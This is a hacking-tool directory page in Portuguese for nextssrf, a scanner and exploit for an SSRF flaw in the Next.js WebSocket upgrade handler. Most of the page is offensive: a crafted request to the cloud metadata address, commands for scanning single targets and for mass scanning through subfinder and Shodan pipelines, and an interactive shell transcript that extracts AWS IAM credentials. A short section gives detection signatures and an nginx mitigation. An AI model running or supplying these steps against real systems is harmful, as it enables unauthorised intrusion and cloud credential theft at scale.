Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
nextssrf — Ferramenta de scanner e exploit CVE-2026-44578 para SSRF no manipulador de upgrade WebSocket do Next.js. Detecta versões vulneráveis, extrai metadados de nuvem e exfiltra credenciais IAM por meio de shell interativo. | Kitploit
Ferramentas/GitHubGitHub/ynsmroztas/nextssrf
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança na Nuvem
GitHubynsmroztas/nextssrf

nextssrf

Ferramenta de scanner e exploit CVE-2026-44578 para SSRF no manipulador de upgrade WebSocket do Next.js. Detecta versões vulneráveis, extrai metadados de nuvem e exfiltra credenciais IAM por meio de shell interativo.

Ver Repositório
762013há 4 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
╔══════════════════════════════════════════════════════════════╗
║         NextSSRF — CVE-2026-44578 Scanner & Exploit          ║
║   Next.js WebSocket Upgrade Handler SSRF                     ║
║   Affected: 13.4.13 → 15.5.15, 16.0.0 → 16.2.4              ║
║         @mitsec / ynsmroztas — Bug Bounty Tooling            ║
╚══════════════════════════════════════════════════════════════╝

Python CVE CVSS License Platform

CVE-2026-44578 — Falsificação de Solicitação no Lado do Servidor via Manipulador de Upgrade WebSocket do Next.js

Visão geral · Instalação · Uso · Pipeline · Shodan · Shell interativo · Aviso legal


Visão geral

Em 11 de maio de 2026, a Vercel corrigiu o CVE-2026-44578 (CVSS 8.6): um SSRF não autenticado no manipulador de upgrade WebSocket do Next.js que afeta todas as implantações self-hosted a partir da versão 13.4.13.

Mecanismo

GET http://169.254.169.254/latest/meta-data/ HTTP/1.1   ← absolute-form URI
Host: vulnerable-nextjs.com
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==

A // em http:// aciona a saída antecipada de normalizeRepeatedSlashes, definindo statusCode: 308 e finished: true. O manipulador de upgrade vulnerável ignora ambas as flags e chama proxyRequest quando parsedUrl.protocol é truthy — encaminhando a requisição via proxy para o host controlado pelo atacante na porta 80.

// router-server.ts (vulnerable)
- if (parsedUrl.protocol) {
-     return await proxyRequest(req, socket, parsedUrl, head)
+ if (finished && parsedUrl.protocol) {
+     if (!statusCode) {
+         return await proxyRequest(req, socket, parsedUrl, head)

Versões afetadas

ProdutoVulnerávelCorreção
Next.js13.4.13 – 15.5.1515.5.16
Next.js16.0.0 – 16.2.416.2.5
Hospedado na Vercel✅ Não afetadoN/A

Limitações

  • Somente GET (sem POST/PUT)
  • Somente porta 80 (portas explícitas removidas pela normalização de URL)
  • IMDSv2 da AWS não explorável (requer token PUT)
  • O metadata do GCP rejeita Upgrade: websocket com 400
  • Proxies reversos (nginx/caddy/HAProxy) bloqueiam URIs em formato absoluto

Demonstração

NextSSRF — credenciais da AWS exfiltradas

Credenciais AWS IMDSv1 exfiltradas via CVE-2026-44578 — shell de exploit interativo


Instalação

git clone https://github.com/ynsmroztas/nextssrf
cd nextssrf
python3 nextssrf.py -t https://target.com

Zero dependências — apenas stdlib do Python. Requer Python 3.10+.


Uso

Varredura de alvo único

python3 nextssrf.py -t https://target.com

Direcionamento específico por nuvem

# AWS metadata only
python3 nextssrf.py -t https://target.com --cloud aws

# Custom internal target
python3 nextssrf.py -t https://target.com \
  --ssrf-host http://internal-api --path /admin

# Deep scan (+ internal services)
python3 nextssrf.py -t https://target.com --cloud aws --deep

Varredura em massa (Pipeline)

# subfinder + httpx + nextssrf
subfinder -d target.com | httpx -silent | \
  python3 nextssrf.py --pipe --threads 20 --cloud aws -o results.jsonl

# File input
python3 nextssrf.py -f targets.txt --threads 15 -o results.json

# Force scan (even if version unknown)
python3 nextssrf.py -t https://target.com --force

Códigos de saída

CódigoSignificado
0Não vulnerável / limpo
1Vulnerável (sem exploit)
2SSRF confirmado

Shell interativo

Shell de exploit avançado com detecção automática de nuvem e extração de credenciais IAM:

python3 nextssrf.py -t https://target.com
╔══════════════════════════════════════════════════╗
║  NextSSRF v2 — Interactive Exploit Shell         ║
║  Target : ec2-x-x-x-x.compute.amazonaws.com     ║
║  CVE    : CVE-2026-44578  |  Status: Connected   ║
╚══════════════════════════════════════════════════╝

nextssrf(ec2-x...)> cloud
  [>] Detecting cloud provider...
  ✓ AWS — matched: ['ami-id', 'instance-id', 'iam/', 'hostname']
  → Run 'aws' for full credential extraction

nextssrf(ec2-x...)> aws
  [1/3] Instance Information
  [200] Hostname    : ip-172-31-47-134.ec2.internal
  [200] AZ          : us-east-1d
  [200] Account ID  : {"AccountId": "370741706736"}

  [2/3] IAM Role Discovery
  ✓ IAM Role found: my-ec2-role

  [3/3] Credential Extraction
  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
  🎯 AWS CREDENTIALS EXFILTRATED!
  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
  AccessKeyId : ASIAXXXXXXXXXXXXXXXXXX
  SecretKey   : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  Expiration  : 2026-05-14T22:32:22Z

Comandos do shell

ComandoDescrição
cloudDetecção automática de nuvem (AWS/Azure/GCP/DO/OCI)
awsCadeia completa de credenciais AWS IAM
azureToken de identidade gerenciada do Azure
scanDetecção de nuvem + exploit automático
url <http://>Requisição SSRF personalizada
get <N>Alvo IMDS da AWS por índice
listMostra todos os endpoints IMDS
historyHistórico de requisições
saveExporta a sessão para JSON
quitSair

Modo automático

# Detect cloud + run full exploit chain automatically
python3 nextssrf.py -t https://target.com --auto

Exemplos de pipeline

# Full recon → exploit pipeline
subfinder -d target.com \
  | httpx -silent -server \
  | grep -i "next" \
  | python3 nextssrf.py --pipe --cloud aws --deep -o findings.jsonl

# Shodan mass scan → interactive on confirmed hosts
python3 shodan_nextjs.py --key KEY --org "TargetCorp" \
  | python3 nextssrf.py --pipe --cloud aws -o hits.jsonl

# Check specific version range
cat hosts.txt \
  | python3 nextssrf.py --pipe --force --cloud aws \
  | jq '.[] | select(.ssrf_hits | length > 0)'

Detecção (Blue Team)

Sinais de exploração nos logs:

# Next.js process logs
Failed to proxy http:/   ← single slash = normalization fingerprint

# Access logs (absolute-form URI + Upgrade header)
GET http://169.254.169.254/... HTTP/1.1
Connection: Upgrade
Upgrade: websocket

Mitigação (se não puder aplicar o patch)

# Nginx: reject absolute-form request URIs
if ($request_uri ~* "^https?://") {
    return 400;
}

Referências

  • GHSA-c4j6-fc7j-m34r
  • NVD CVE-2026-44578
  • Release de Segurança do Next.js de Maio de 2026
  • Análise Técnica da Hadrian

Aviso legal

Baixar ferramenta